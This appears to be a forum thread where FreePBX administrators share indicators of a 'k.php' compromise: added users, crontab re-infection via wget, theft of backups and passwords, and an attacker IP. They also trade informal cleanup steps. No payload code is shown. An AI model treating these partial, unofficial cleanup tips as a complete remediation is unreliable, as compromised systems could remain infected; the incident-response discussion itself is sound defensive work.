If you were impacted by the restapps security regression a week or two ago, it is possible you were hit with a php script that is currently labeled “k.php” If you want to see if you were compromised by this script, I’ve included some content below that you can check. I do not claim to have identified everything, but I’m hoping this might help someone.
Anyways, here are the places you can look.
crontab -e -u root → if this line exists, you’re compromised. DO NOT run this for testing.
cat /etc/shadow → if these users exist, you’re compromised.
bad users → supports, supermaint, sugarmaint
The following files will contain bad content that runs a wget to re-download k.php and re-infect your system. You have to echo the file content and pipe to base64 -d if you want to read it, but here are some of the files that you will find that contain bad content.
same problem, same ip , same files + freepbx_engine.php.
Attention the script seems to steal the freepbx backups and the passwords contained.
The strange thing is that no calls have been made and the malicious code does not compromise any functionality of freepbx. It seems like some preparatory stuff.
I would not trust any of your backups, as they contain a lot of content that has been compromised and you don’t know if your asterisk files have been tampered with or not. So, you will need to reinstall. I would advise completing all of your security steps upon fresh install - new creds, new certs, etc., ** Correction: You might have a good backup from early december you can load from, but you’ll want to validate **
That said, there are aspects of your system you can pull out en masse without concern. If you use bulk handler for your extensions, use new secrets.
I know it’s technically possible to clean out what has been infected, but given the scope, you will never really have that peace of mind of knowing the system is clean again. Because the hack adds linux users, they can access the system and load who knows what else and cover their tracks.
Hi everybody!
I was catch this shit with bonus feature - command line inaccessible after login without ability FreePBX connect to ip 37.49.230.74
After analysis I tried to clean system by following commands:
Just found a system tonight with this and spent about 2 hours tracing out the file. Was able to interrupt the program by editing the /var/www/html/admin/modules/freepbx_ha/license.php file and removing the line that re-writes root crontab.
I then discovered this was also in asterisk’s crontab and removed it from there as well.
This seems to have stopped the loop of re-intalling.
crap it looks like most of my systems got hit by this… I only have two weeks of backups so can’t do that. Is there any official way to clean this mess off a system?
Which passwords secrets?? just the phone system one or system
root passwords etc?
I don’t know much about iptables, but putting 37.49.230.74 in the blacklist of the firewall doesn’t seem to stop outbound connections to the hackers server.
Can anyone post the rules needed to stop the script connecting? I can see the outbound connections keep happening using Netstat.
I don’t have such problems.
Try to change repos to another mirror
fwconsole setting MODULE_REPO https://{mirror or mirror1}.freepbx.org
yum update and reboot.
After logon you need block access to ip 37.49.230.74 and try to clean
if you edit /var/www/html/admin/modules/freepbx_ha/licence.php and remove all the commands except the delete users command. then save it an delete the line from the root crontab and asterisk crontab and it should stop the cycle…